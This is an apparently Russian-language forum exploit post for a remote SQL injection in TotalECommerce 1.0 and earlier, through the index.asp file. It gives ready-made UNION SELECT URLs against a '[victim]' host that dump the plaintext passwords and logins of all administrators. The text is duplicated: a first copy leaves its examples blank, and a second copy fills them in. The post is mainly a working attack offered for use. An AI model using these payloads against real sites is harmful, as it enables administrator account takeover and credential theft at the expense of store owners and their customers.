SQL-инъекция в TotalECommerce <=1.0
программа: TotalECommerce <= 1.0
Описание:
Вчера была найдена Remote SQL-инъекция в TotalECommerce <= 1.0. Уязвим файл index.asp. Дает возможность получить чистый пароль любого администратора и его логин.
Использование:
Пример1 ->
Пример 2 ->
подробнее
P.S. Уязвимость по ходу нашёл какой-то португалец т.к. по португальски
senha - Означает пароль
administradores - Означает администраторы...
secao - сессия...
программа: TotalECommerce <= 1.0
Описание:
Вчера была найдена Remote SQL-инъекция в TotalECommerce <= 1.0. Уязвим файл index.asp. Дает возможность получить чистый пароль любого администратора и его логин.
Использование:
Код:
GET -> http://[victim]/[dir]/index.asp?secao=[PageID]&id=[SQL]
Код:
http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+senha,senha,senha,senha,senha,senha,senha,senha,
senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,
senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,
senha,senha,senha+from+administradores
Код:
http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+login,login,login,login,login,login,login,login,login,login,
login,login,login,login,login,login,login,login,login,login,login,login,login,login,
login,login,login,login,login,login,login,login,login+from+administradoresъподробнее
P.S. Уязвимость по ходу нашёл какой-то португалец т.к. по португальски
senha - Означает пароль
administradores - Означает администраторы...
secao - сессия...